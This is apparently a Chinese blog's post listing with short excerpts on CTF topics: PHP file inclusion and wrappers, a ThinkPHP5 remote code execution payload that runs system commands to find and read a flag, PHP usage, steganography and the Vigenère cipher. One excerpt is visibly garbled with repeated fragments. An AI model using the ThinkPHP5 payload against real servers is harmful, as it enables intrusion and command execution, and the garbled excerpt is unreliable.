- 博客(6)
- 收藏
- 关注
RSS订阅原创 文件包含漏洞(一)
1.造成文件包含漏洞的函数通常有:include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readline2.data协议用法:data://text/plain,xxxx(要执行的php代码)data://text/plain;base64,xxxx(base64编码后的数据)3.php://协议php://input,用于执行php代码,需要post请
2021-01-15 20:12:05
208
原创 php一些函数
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。MyClass是个类名,不用加符号。符号。符号。_va
2021-01-15 18:57:17
252
原创 thinkphp5的漏洞
payload:s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看fla
2021-01-15 16:41:42
405
原创 php运行方式
php运行方式运行php文件 php -f 路径+文件名 或者 php 路径+文件名(小技巧:windows下面可以把文件直接拖进去,省去cd/命令,或者慢慢拼写完整路径)两种方法都可以执行命令,如果是.php文件则执行php代码,否则直接以字符串形式读取文件或者直接用php.exe或者在cmd下php -a如果想要在本地测试可以先把文件放入www目录下,登录127.0.0.1/xx.php以下就是我所了解几种可以运行php的方法...
2021-01-07 15:08:01
389
原创 cloacked-pixel隐写
cloacked-pixel隐写,以月赛中的一道题为例,密码zaqqaz,得到一张图片,是cloacked-pixel隐写,使用方法如下。cloacked-pixel安装解压cloacked-pixel-master.zip到虚拟机cloacked-pixel使用加密:python lsb.py hide big.png 1.txt 123456ps: hide:表示加密模式; big.png:待加密的png图片; 1.txt:存放payload; 123456:加密的密码解密:pytho
2021-01-06 17:26:28
5615
1
原创 维吉尼亚密码
维吉尼亚密码是在凯撒密码基础上产生的一种加密方法,它将凯撒密码的全部25种位移排序为一张表,与原字母序列共同组成26行及26列的字母表。另外,维吉尼亚密码必须有一个密钥,这个密钥由字母组成,最少一个,最多可与明文字母数量相等。维吉尼亚密码加密方法示例如下:明文:I’ve got it.密钥:ok密文:W’fs qcd wd.首先,密钥长度需要与明文长度相同,如果少于明文长度,则重复拼接直到相同。本例中,明文长度为8个字母(非字母均被忽略),密钥会被程序补全为“okokokok”。现在根据如下维吉尼亚
2020-12-29 17:33:53
647
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人